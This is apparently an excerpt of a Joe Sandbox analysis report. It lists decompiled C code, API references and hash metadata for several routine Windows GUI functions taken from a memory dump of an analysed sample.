GetWindowRect.USER32 ref: 00CD563F

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Rect_strlen$EmptyH_prolog3H_prolog3_Window
String ID:
API String ID: 2312620982-0
Opcode ID: 782aaa7f2e46c7bb5edc3274772cbe0099172a31acb7326655d1e9f202256336
Instruction ID: fd0a9edd8602f91aab94bb45908d21cfb7e8bab8f28d539a50cc1286efd7dc8f
Opcode Fuzzy Hash: 782aaa7f2e46c7bb5edc3274772cbe0099172a31acb7326655d1e9f202256336
Instruction Fuzzy Hash: C2615B71A01219AFDF04EFA4D991AEEBBB5FF04300F14416AF956A7291DB30AA05DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CBD258 Relevance: 7.7, APIs: 5, Instructions: 152
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E00CBD258(void* __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t64;
				struct HWND__* _t68;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				void* _t110;
				void* _t129;
				intOrPtr* _t131;
				signed int _t133;
				struct HWND__* _t134;
				void* _t140;

				_t132 = __esi;
				_t129 = __edx;
				_t111 = __ecx;
				_t109 = __ebx;
				_push(0x40);
				E00DDD595(0xe08d00, __ebx, __edi, __esi);
				_t131 = __ecx;
				 *((intOrPtr*)(_t140 - 0x24)) = __ecx;
				_t144 =  *((intOrPtr*)(_t140 + 0x10));
				if( *((intOrPtr*)(_t140 + 0x10)) == 0) {
					 *((intOrPtr*)(_t140 + 0x10)) =  *((intOrPtr*)(E00CACEEE(__ebx, __ecx, __esi, _t144) + 0xc));
				}
				_t64 = E00CACEEE(_t109, _t131, _t132, _t144);
				_t110 = 0;
				 *(_t140 - 0x2c) =  *(_t140 - 0x2c) & 0;
				 *(_t140 - 4) =  *(_t140 - 4) & 0;
				_t133 =  *(_t64 + 0x3c);
				 *(_t140 - 0x18) = _t133;
				 *(_t140 - 0x28) = 0;
				E00CB0D45(_t111, _t133, _t144, 0x10);
				E00CB0D45(_t111, _t133, _t144, 0x3c000);
				E00CC147B();
				if(_t133 == 0) {
					_t68 =  *(_t140 + 8);
					L6:
					 *(_t140 - 0x14) = _t68;
					if(_t68 != 0) {
						_t112 = _t140 - 0x20;
						E00CA67E1(_t140 - 0x20);
						 *(_t140 - 4) = 1;
						 *((short*)(_t140 - 0x1c)) = 0;
						__eflags = E00CC24B3(_t110, __eflags,  *(_t140 - 0x14), _t140 - 0x20, _t140 - 0x1c);
						if(__eflags == 0) {
							E00CC2464(_t110, _t140 - 0x3c, _t131, _t133,  *(_t140 - 0x14));
							 *(_t140 - 4) = 2;
							E00CC27FD(_t140 - 0x3c,  *((intOrPtr*)(_t140 - 0x1c)));
							_t110 = E00CC24AD(_t140 - 0x3c);
							 *(_t140 - 4) = 1;
							_t112 = _t140 - 0x3c;
							 *(_t140 - 0x28) = _t110;
							E00CC249F(_t140 - 0x3c);
							__eflags = _t110;
							if(__eflags != 0) {
								 *(_t140 - 0x14) = GlobalLock(_t110);
							}
						}
						 *(_t131 + 0x68) =  *(_t131 + 0x68) | 0xffffffff;
						 *(_t131 + 0x60) =  *(_t131 + 0x60) | 0x00000010;
						_push(_t131);
						E00CB10B9(_t110, _t129, _t131, _t133, __eflags);
						_t75 =  *(_t140 + 0xc);
						__eflags = _t75;
						if(__eflags != 0) {
							_t75 =  *(_t75 + 0x20);
						}
						_push(0);
						_push(E00CBD063);
						_push(_t75);
						_push( *(_t140 - 0x14));
						_push( *((intOrPtr*)(_t140 + 0x10)));
						 *(_t140 - 0x14) = E00CBDC24(_t110, _t112, _t131, _t133, __eflags);
						E00CA2975(_t76,  *((intOrPtr*)(_t140 - 0x20)) + 0xfffffff0);
						 *(_t140 - 4) =  *(_t140 - 4) | 0xffffffff;
						__eflags = _t133;
						if(__eflags != 0) {
							 *0xe17a64(_t140 - 0x4c);
							 *((intOrPtr*)( *((intOrPtr*)( *_t133 + 0x18))))();
							__eflags =  *(_t140 - 0x14);
							if(__eflags != 0) {
								 *0xe17a64(0);
								 *((intOrPtr*)( *((intOrPtr*)( *_t131 + 0x15c))))();
							}
						}
						_t78 = E00CB13EC(_t110, _t129, __eflags);
						__eflags = _t78;
						if(_t78 == 0) {
							 *0xe17a64();
							 *((intOrPtr*)( *((intOrPtr*)( *_t131 + 0x120))))();
						}
						_t134 =  *(_t140 - 0x14);
						__eflags = _t134;
						if(_t134 != 0) {
							__eflags =  *(_t131 + 0x60) & 0x00000010;
							if(( *(_t131 + 0x60) & 0x00000010) == 0) {
								DestroyWindow(_t134);
								_t134 = 0;
								__eflags = 0;
							}
						}
						__eflags = _t110;
						if(_t110 != 0) {
							GlobalUnlock(_t110);
							GlobalFree(_t110);
						}
						__eflags = _t134;
						_t61 = _t134 != 0;
						__eflags = _t61;
						_t80 = 0 | _t61;
						L25:
						return E00DDD4FA(_t80);
					}
					L7:
					_t80 = 0;
					goto L25;
				}
				 *0xe17a64(_t140 - 0x4c);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t131 + 0x15c))))() == 0) {
					goto L7;
				}
				 *0xe17a64(_t140 - 0x4c,  *(_t140 + 8));
				_t68 =  *((intOrPtr*)( *((intOrPtr*)( *( *(_t140 - 0x18)) + 0x14))))();
				_t133 =  *(_t140 - 0x18);
				goto L6;
			}

0x00cbd258
0x00cbd258
0x00cbd258
0x00cbd258
0x00cbd258
0x00cbd25f
0x00cbd264
0x00cbd266
0x00cbd269
0x00cbd26d
0x00cbd277
0x00cbd277
0x00cbd27a
0x00cbd27f
0x00cbd281
0x00cbd284
0x00cbd287
0x00cbd28c
0x00cbd28f
0x00cbd292
0x00cbd29c
0x00cbd2a1
0x00cbd2a8
0x00cbd2e7
0x00cbd2ea
0x00cbd2ea
0x00cbd2ef
0x00cbd2f8
0x00cbd2fb
0x00cbd302
0x00cbd306
0x00cbd31d
0x00cbd31f
0x00cbd327
0x00cbd332
0x00cbd336
0x00cbd343
0x00cbd345
0x00cbd349
0x00cbd34c
0x00cbd34f
0x00cbd354
0x00cbd356
0x00cbd35f
0x00cbd35f
0x00cbd356
0x00cbd362
0x00cbd366
0x00cbd36a
0x00cbd36b
0x00cbd370
0x00cbd373
0x00cbd375
0x00cbd377
0x00cbd377
0x00cbd37a
0x00cbd37c
0x00cbd381
0x00cbd382
0x00cbd385
0x00cbd393
0x00cbd396
0x00cbd3c5
0x00cbd3c9
0x00cbd3cb
0x00cbd3d8
0x00cbd3e1
0x00cbd3e3
0x00cbd3e7
0x00cbd3f5
0x00cbd3fd
0x00cbd3fd
0x00cbd3e7
0x00cbd3ff
0x00cbd404
0x00cbd406
0x00cbd412
0x00cbd41a
0x00cbd41a
0x00cbd41c
0x00cbd41f
0x00cbd421
0x00cbd423
0x00cbd427
0x00cbd42a
0x00cbd430
0x00cbd430
0x00cbd430
0x00cbd427
0x00cbd432
0x00cbd434
0x00cbd437
0x00cbd43e
0x00cbd43e
0x00cbd446
0x00cbd448
0x00cbd448
0x00cbd448
0x00cbd44b
0x00cbd450
0x00cbd450
0x00cbd2f1
0x00cbd2f1
0x00000000
0x00cbd2f1
0x00cbd2b8
0x00cbd2c4
0x00000000
0x00000000
0x00cbd2d7
0x00cbd2e0
0x00cbd2e2
0x00000000

APIs

__EH_prolog3_catch.LIBCMT ref: 00CBD25F

Part of subcall function 00CC24B3: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000020,00000000,00000000,00000020,00000020,?,?,?,00CBD31A,?,?), ref: 00CC2511

GlobalLock.KERNEL32 ref: 00CBD359
DestroyWindow.USER32(?,?,?,?,Function_0001D063,00000000), ref: 00CBD42A
GlobalUnlock.KERNEL32(00000000,?,?,?,Function_0001D063,00000000), ref: 00CBD437
GlobalFree.KERNEL32 ref: 00CBD43E

Part of subcall function 00CC27FD: GetStockObject.GDI32(00000011), ref: 00CC281F
Part of subcall function 00CC27FD: GetStockObject.GDI32(0000000D), ref: 00CC282B
Part of subcall function 00CC27FD: GetObjectA.GDI32(00000000,0000003C,?), ref: 00CC283C
Part of subcall function 00CC27FD: GetDC.USER32(00000000), ref: 00CC284B
Part of subcall function 00CC27FD: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00CC2862
Part of subcall function 00CC27FD: MulDiv.KERNEL32(?,00000048,00000000), ref: 00CC286E
Part of subcall function 00CC27FD: ReleaseDC.USER32 ref: 00CC287A

Part of subcall function 00CC249F: GlobalFree.KERNEL32 ref: 00CC24A6

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Global$Object$FreeStock$ByteCapsCharDestroyDeviceH_prolog3_catchLockMultiReleaseUnlockWideWindow
String ID:
API String ID: 3060192867-0
Opcode ID: 76b483a143e15a7b8e9d362f08e35939de8edb7f8b7f0bd25401bbc16a5a259b
Instruction ID: f7ec6d8ba29c98e83d7c289084c051b8ca946a33e6c5ca43362df6f308446256
Opcode Fuzzy Hash: 76b483a143e15a7b8e9d362f08e35939de8edb7f8b7f0bd25401bbc16a5a259b
Instruction Fuzzy Hash: 4E516131E0025ADFCF05DFA4C995AEEBBB4AF08710F144059F916B7292DB349E05DB91

Uniqueness

Uniqueness Score: -1.00%

Function 00D1105F Relevance: 7.6, APIs: 5, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00D1105F(void* __ecx, void* __edx, void* __edi, struct tagPOINT* _a4) {
				signed int _v8;
				struct tagRECT _v24;
				struct tagRECT _v40;
				struct tagRECT _v56;
				struct tagPOINT* _v60;
				void* __ebx;
				void* __esi;
				signed int _t42;
				intOrPtr _t52;
				void* _t62;
				void* _t69;
				void* _t72;
				void* _t78;
				intOrPtr _t81;
				void* _t85;
				struct tagPOINT* _t89;
				signed int _t92;

				_t86 = __edi;
				_t85 = __edx;
				_t42 =  *0xe68dd4; // 0x8d2643c2
				_v8 = _t42 ^ _t92;
				_t89 = _a4;
				_t78 = __ecx;
				_v24.left = 0;
				_v24.top = 0;
				_v24.right = 0;
				_v24.bottom = 0;
				_v60 = _t89;
				GetClientRect( *(__ecx + 0x20),  &_v24);
				E00CB9BF2(_t78,  &_v24);
				_push(_t89->y);
				if(PtInRect( &_v24,  *_t89) != 0) {
					_push(__edi);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_t52 =  *((intOrPtr*)(_t78 + 0xf60));
					if(_t52 == 0) {
						_v40.right =  *((intOrPtr*)(_t78 + 0xf58)) + _v24.left;
					} else {
						_t69 = _t52 - 1;
						if(_t69 == 0) {
							_v40.left = _v24.right -  *((intOrPtr*)(_t78 + 0xf58));
						} else {
							_t72 = _t69 - 1;
							if(_t72 == 0) {
								_v40.bottom =  *((intOrPtr*)(_t78 + 0xf58)) + _v24.top;
							} else {
								if(_t72 == 1) {
									_v40.top = _v24.bottom -  *((intOrPtr*)(_t78 + 0xf58));
								}
							}
						}
					}
					_t91 = _v60;
					_push(_t91->y);
					if(PtInRect( &_v40, _t91->x) == 0) {
						_t81 =  *((intOrPtr*)(_t78 + 0x105c));
						if(_t91->x <= _v24.right - _t81) {
							if(_t91->y <= _v24.bottom - _t81) {
								_t35 = _t78 + 0x107c; // 0x107c
								_t91 = _t35;
								if(IsRectEmpty(_t35) != 0) {
									L20:
									_t62 = 0;
									goto L21;
								}
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								E00CB9BF2(_t78,  &_v56);
								_t91 = _v60;
								_push(_t91->y);
								if(PtInRect( &_v56,  *_t91) == 0) {
									goto L20;
								}
								_push(5);
								goto L19;
							}
							_push(2);
							goto L19;
						}
						_t62 = 1;
						goto L21;
					} else {
						_push(3);
						L19:
						_pop(_t62);
						L21:
						_pop(_t86);
						goto L22;
					}
				} else {
					_t62 = 4;
					L22:
					return E00DDCBCE(_t62, _t78, _v8 ^ _t92, _t85, _t86, _t91);
				}
			}

0x00d1105f
0x00d1105f
0x00d11065
0x00d1106c
0x00d11073
0x00d11076
0x00d11078
0x00d1107b
0x00d1107e
0x00d11081
0x00d1108b
0x00d1108e
0x00d1109a
0x00d1109f
0x00d110b0
0x00d110c3
0x00d110c7
0x00d110c8
0x00d110c9
0x00d110ca
0x00d110cb
0x00d110ce
0x00d11112
0x00d110d0
0x00d110d0
0x00d110d3
0x00d11104
0x00d110d5
0x00d110d5
0x00d110d8
0x00d110f6
0x00d110da
0x00d110dd
0x00d110e8
0x00d110e8
0x00d110dd
0x00d110d8
0x00d110d3
0x00d11115
0x00d1111b
0x00d11129
0x00d11132
0x00d1113c
0x00d1114b
0x00d11151
0x00d11151
0x00d11160
0x00d1118f
0x00d1118f
0x00000000
0x00d1118f
0x00d11167
0x00d1116c
0x00d1116d
0x00d1116e
0x00d1116f
0x00d11174
0x00d1117a
0x00d11188
0x00000000
0x00000000
0x00d1118a
0x00000000
0x00d1118a
0x00d1114d
0x00000000
0x00d1114d
0x00d11140
0x00000000
0x00d1112b
0x00d1112b
0x00d1118c
0x00d1118c
0x00d11191
0x00d11191
0x00000000
0x00d11191
0x00d110b2
0x00d110b4
0x00d11192
0x00d1119f
0x00d1119f

APIs

GetClientRect.USER32(?,?), ref: 00D1108E

Part of subcall function 00CB9BF2: ClientToScreen.USER32(?,?), ref: 00CB9C01
Part of subcall function 00CB9BF2: ClientToScreen.USER32(?,?), ref: 00CB9C0E

PtInRect.USER32(?,00000000,?), ref: 00D110A8
PtInRect.USER32(?,?,?), ref: 00D11121

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: ClientRect$Screen
String ID:
API String ID: 3187875807-0
Opcode ID: de72e93db3888e32974dccb1090135e8010de3d1ea8e56a1256c21f572127dc8
Instruction ID: 308f72a1f844964030b10d3f6dde67a29829284ecfb32f76c1cf51c339e7318f
Opcode Fuzzy Hash: de72e93db3888e32974dccb1090135e8010de3d1ea8e56a1256c21f572127dc8
Instruction Fuzzy Hash: E041FE75A0060ABFCF10CFA8D945AEEBBB5EF09740F144465EA45F7254DB30EA849B60

Uniqueness

Uniqueness Score: -1.00%

Function 00D0891A Relevance: 7.6, APIs: 5, Instructions: 116
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E00D0891A(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
				long* _t74;
				long* _t77;
				signed int _t80;
				signed int _t81;
				signed int _t82;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				struct tagPOINT* _t94;
				signed int _t103;
				signed int _t104;
				signed int _t106;
				struct tagPOINT* _t108;
				struct tagPOINT* _t110;
				signed int _t111;
				signed int _t112;
				void* _t114;
				void* _t115;
				void* _t116;

				_t116 = __eflags;
				E00DDD52C(0xe0a9fc, __ebx, __edi, __esi);
				_t114 = __ecx;
				 *(_t115 - 0x10) =  *(__ecx + 0x8c);
				 *(__ecx + 0x8c) =  *(_t115 + 8);
				 *(__ecx + 0x90) =  *(_t115 + 0xc);
				 *(__ecx + 0x94) =  *(_t115 + 0x10);
				E00CB90E5(__ebx, _t115 - 0x24,  *(_t115 + 0x10), __edi, __ecx, _t116, 0, 0x18);
				 *(_t115 - 4) =  *(_t115 - 4) & 0x00000000;
				E00CBA3FF(_t115 - 0x24,  *(__ecx + 0x8c));
				_t108 = __ecx + 0x98;
				_t108->x =  *(__ecx + 0x90);
				_t108->y =  *(__ecx + 0x94);
				LPtoDP( *(_t115 - 0x1c), _t108, 1);
				_t74 =  *(_t115 + 0x14);
				_t110 = __ecx + 0xa0;
				_t110->x =  *_t74;
				_t110->y = _t74[1];
				LPtoDP( *(_t115 - 0x1c), _t110, 1);
				_t77 =  *(_t115 + 0x18);
				_t94 = __ecx + 0xa8;
				_t94->x =  *_t77;
				_t94->y = _t77[1];
				LPtoDP( *(_t115 - 0x1c), _t94, 1);
				_t80 =  *(__ecx + 0x9c);
				if(_t80 < 0) {
					 *(__ecx + 0x9c) =  ~_t80;
				}
				_t81 =  *(_t114 + 0xa4);
				if(_t81 < 0) {
					 *(_t114 + 0xa4) =  ~_t81;
				}
				_t82 =  *(_t114 + 0xac);
				if(_t82 < 0) {
					 *(_t114 + 0xac) =  ~_t82;
				}
				 *(_t115 - 4) =  *(_t115 - 4) | 0xffffffff;
				_t83 = E00CB9360(_t115 - 0x24);
				_t111 = _t110->x;
				_t103 = 0xa;
				if(_t111 == 0) {
					_t89 =  *(_t114 + 0x98);
					asm("cdq");
					_t83 = _t89 / _t103;
					_t108 = _t89 % _t103;
					_t111 = _t89 / _t103;
					 *(_t114 + 0xa0) = _t111;
				}
				_t104 =  *(_t114 + 0xa4);
				if(_t104 == 0) {
					_t88 =  *(_t114 + 0x9c);
					_t106 = 0xa;
					asm("cdq");
					_t83 = _t88 / _t106;
					_t108 = _t88 % _t106;
					_t104 = _t88 / _t106;
					 *(_t114 + 0xa4) = _t104;
				}
				_push(0xa);
				if(_t94->x != 0) {
					_pop(_t112);
				} else {
					_t87 = _t111;
					asm("cdq");
					_pop(_t112);
					_t83 = _t87 / _t112;
					_t108 = _t87 % _t112;
					_t94->x = _t87 / _t112;
				}
				if( *(_t114 + 0xac) == 0) {
					_t86 = _t104;
					asm("cdq");
					_t83 = _t86 / _t112;
					_t108 = _t86 % _t112;
					 *(_t114 + 0xac) = _t86 / _t112;
				}
				if( *(_t114 + 0x20) != 0) {
					E00D08B13(_t114, _t108);
					_t83 =  *(_t115 - 0x10);
					if( *(_t115 - 0x10) !=  *((intOrPtr*)(_t114 + 0x8c))) {
						_t83 = InvalidateRect( *(_t114 + 0x20), 0, 1);
					}
				}
				return E00DDD4FA(_t83);
			}

0x00d0891a
0x00d08921
0x00d08926
0x00d08934
0x00d0893a
0x00d08945
0x00d0894b
0x00d08951
0x00d0895c
0x00d08963
0x00d0896e
0x00d08980
0x00d08982
0x00d08985
0x00d0898b
0x00d0898e
0x00d0899f
0x00d089a1
0x00d089a4
0x00d089aa
0x00d089ad
0x00d089be
0x00d089c0
0x00d089c3
0x00d089c9
0x00d089d1
0x00d089d5
0x00d089d5
0x00d089db
0x00d089e3
0x00d089e7
0x00d089e7
0x00d089ed
0x00d089f5
0x00d089f9
0x00d089f9
0x00d089ff
0x00d08a06
0x00d08a0b
0x00d08a0f
0x00d08a12
0x00d08a14
0x00d08a1a
0x00d08a1b
0x00d08a1b
0x00d08a1d
0x00d08a1f
0x00d08a1f
0x00d08a25
0x00d08a2d
0x00d08a2f
0x00d08a37
0x00d08a38
0x00d08a39
0x00d08a39
0x00d08a3b
0x00d08a3d
0x00d08a3d
0x00d08a46
0x00d08a48
0x00d08a54
0x00d08a4a
0x00d08a4a
0x00d08a4c
0x00d08a4d
0x00d08a4e
0x00d08a4e
0x00d08a50
0x00d08a50
0x00d08a5d
0x00d08a5f
0x00d08a61
0x00d08a62
0x00d08a62
0x00d08a64
0x00d08a64
0x00d08a6d
0x00d08a71
0x00d08a76
0x00d08a7f
0x00d08a87
0x00d08a87
0x00d08a7f
0x00d08a92

APIs

__EH_prolog3.LIBCMT ref: 00D08921

Part of subcall function 00CB90E5: __EH_prolog3.LIBCMT ref: 00CB90EC
Part of subcall function 00CB90E5: GetWindowDC.USER32(00000000,00000004,00CD9743,00000000), ref: 00CB9118

Part of subcall function 00CBA3FF: SetMapMode.GDI32(?,?), ref: 00CBA415
Part of subcall function 00CBA3FF: SetMapMode.GDI32(?,?), ref: 00CBA429

LPtoDP.GDI32(?,?,00000001), ref: 00D08985
LPtoDP.GDI32(?,?,00000001), ref: 00D089A4
LPtoDP.GDI32(?,?,00000001), ref: 00D089C3
InvalidateRect.USER32(?,00000000,00000001), ref: 00D08A87

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: H_prolog3Mode$InvalidateRectWindow
String ID:
API String ID: 1124340077-0
Opcode ID: 52a8b12695e5b5a06a9f914a4e84d56753c70fa1f2695591d7e97bb0a6f1d5c5
Instruction ID: cbcdcfbd0f2138aefaf686d67c91a84346c40113dbd81efd1eddfe1a6c9d89fb
Opcode Fuzzy Hash: 52a8b12695e5b5a06a9f914a4e84d56753c70fa1f2695591d7e97bb0a6f1d5c5
Instruction Fuzzy Hash: 3341C274B00705DFDB24DF69C881BAAB7F1BB49310F14881EE5AE9B291DB70A840DB21

Uniqueness

Uniqueness Score: -1.00%

Function 00CF52FC Relevance: 7.6, APIs: 5, Instructions: 116
windowCOMMON

Download Yara Rule

C-Code - Quality: 71%

			E00CF52FC(intOrPtr* __ecx, void* __edx) {
				signed int _v8;
				void* __ebx;
				void* __ebp;
				signed int _t25;
				void* _t45;
				intOrPtr* _t49;
				void* _t64;
				void* _t66;
				signed int _t69;
				void* _t72;
				intOrPtr _t80;
				void* _t88;

				_t64 = __edx;
				_t51 = __ecx;
				_push(__ecx);
				_t49 = __ecx;
				if( *0xe87384 != 0) {
					L20:
					return _t25;
				}
				if( *((intOrPtr*)(__ecx + 0xbac)) == 0) {
					L4:
					 *(_t49 + 0xcfc) =  *(_t49 + 0xcfc) | 0xffffffff;
					 *(_t49 + 0xd00) =  *(_t49 + 0xd00) | 0xffffffff;
					 *((intOrPtr*)(_t49 + 0xba8)) = 0;
					_t66 = E00CB277F(_t49, _t51, _t64, GetFocus());
					_v8 = 0 | _t66 == _t49;
					_t72 = E00CB277F(_t49, _t51, _t64, GetParent( *(_t49 + 0x20)));
					if(_t72 == 0) {
						L8:
						_t25 = _v8;
						L9:
						if( *(_t49 + 0xbf0) >= 0) {
							L12:
							__eflags = _t25;
							if(_t25 != 0) {
								L18:
								L19:
								goto L20;
							}
							 *0xe17a64();
							_t25 =  *((intOrPtr*)( *((intOrPtr*)( *_t49 + 0x3f4))))();
							__eflags = _t25;
							if(_t25 != 0) {
								goto L18;
							}
							 *(_t49 + 0xbf0) =  *(_t49 + 0xbf0) | 0xffffffff;
							 *0xe17a64(0xffffffff);
							 *((intOrPtr*)( *((intOrPtr*)( *_t49 + 0x3b0))))();
							_t69 = E00CF1BC5(_t49, _t49,  *(_t49 + 0xbf0));
							_t25 = UpdateWindow( *(_t49 + 0x20));
							__eflags = _t69;
							if(_t69 == 0) {
								L16:
								__eflags =  *0xe87d28 - _t49; // 0x0
								if(__eflags == 0) {
									_t25 = SendMessageA( *(E00CB29F1(_t49) + 0x20), 0x362, 0xe001, 0);
								}
								goto L18;
							}
							 *0xe17a64();
							_t25 =  *((intOrPtr*)( *((intOrPtr*)( *_t69 + 0x70))))();
							__eflags = _t25;
							if(_t25 != 0) {
								goto L18;
							}
							goto L16;
						}
						_t88 =  *0xe87d28 - _t49; // 0x0
						if(_t88 != 0) {
							goto L12;
						}
						 *0xe17a64(0xffffffff);
						_t25 =  *((intOrPtr*)( *((intOrPtr*)( *_t49 + 0x418))))();
						goto L18;
					}
					_t63 = _t72;
					if(E00CACB0B(_t72, 0xe22148) == 0) {
						goto L8;
					} else {
						_t12 = _t72 == _t66;
						_t25 = 0 | _t12;
						if(_t12 != 0) {
							_t45 = E00CB277F(_t49, _t63, _t64, GetParent( *(_t72 + 0x20)));
							asm("sbb eax, eax");
							_t25 =  ~(_t45 - _t66) + 1;
						}
						goto L9;
					}
				}
				_t80 =  *0xe8738c; // 0x0
				if(_t80 != 0) {
					goto L4;
				}
				_t25 = E00CF14D6(__ecx, 0);
				if(_t25 != 0) {
					goto L19;
				}
				goto L4;
			}

0x00cf52fc
0x00cf52fc
0x00cf52ff
0x00cf5308
0x00cf530a
0x00cf5468
0x00cf546a
0x00cf546a
0x00cf5319
0x00cf5331
0x00cf5331
0x00cf5338
0x00cf5340
0x00cf5355
0x00cf535e
0x00cf536d
0x00cf5371
0x00cf53a4
0x00cf53a4
0x00cf53a7
0x00cf53ae
0x00cf53d3
0x00cf53d3
0x00cf53d5
0x00cf5466
0x00cf5467
0x00000000
0x00cf5467
0x00cf53e5
0x00cf53ed
0x00cf53ef
0x00cf53f1
0x00000000
0x00000000
0x00cf53fb
0x00cf540c
0x00cf5414
0x00cf5421
0x00cf5423
0x00cf5429
0x00cf542b
0x00cf5442
0x00cf5442
0x00cf5448
0x00cf5460
0x00cf5460
0x00000000
0x00cf5448
0x00cf5434
0x00cf543c
0x00cf543e
0x00cf5440
0x00000000
0x00000000
0x00000000
0x00cf5440
0x00cf53b0
0x00cf53b6
0x00000000
0x00000000
0x00cf53c4
0x00cf53cc
0x00000000
0x00cf53cc
0x00cf5378
0x00cf5381
0x00000000
0x00cf5383
0x00cf5387
0x00cf5387
0x00cf538a
0x00cf5396
0x00cf539f
0x00cf53a1
0x00cf53a1
0x00000000
0x00cf538a
0x00cf5381
0x00cf531b
0x00cf5321
0x00000000
0x00000000
0x00cf5324
0x00cf532b
0x00000000
0x00000000
0x00000000

APIs

GetFocus.USER32 ref: 00CF5346
GetParent.USER32(?), ref: 00CF5361
GetParent.USER32(?), ref: 00CF538F
UpdateWindow.USER32(?), ref: 00CF5423
SendMessageA.USER32(?,00000362,0000E001,00000000), ref: 00CF5460

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Parent$FocusMessageSendUpdateWindow
String ID:
API String ID: 2438739141-0
Opcode ID: a0d4e0ac9ea22b73548ad6b259ec84620fedd3cba491260a65af6caf6fff5ac9
Instruction ID: ef4ffb2b31487c35079139f597a9f9c7bdbd827f0727568398d980067737dcad
Opcode Fuzzy Hash: a0d4e0ac9ea22b73548ad6b259ec84620fedd3cba491260a65af6caf6fff5ac9
Instruction Fuzzy Hash: 44411435600B158FCF106F35CC88A7D7AB1AF44761F140278EF65AB2E5DB308A45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00CFEB2F Relevance: 7.6, APIs: 5, Instructions: 112
windowCOMMON

Download Yara Rule

C-Code - Quality: 69%

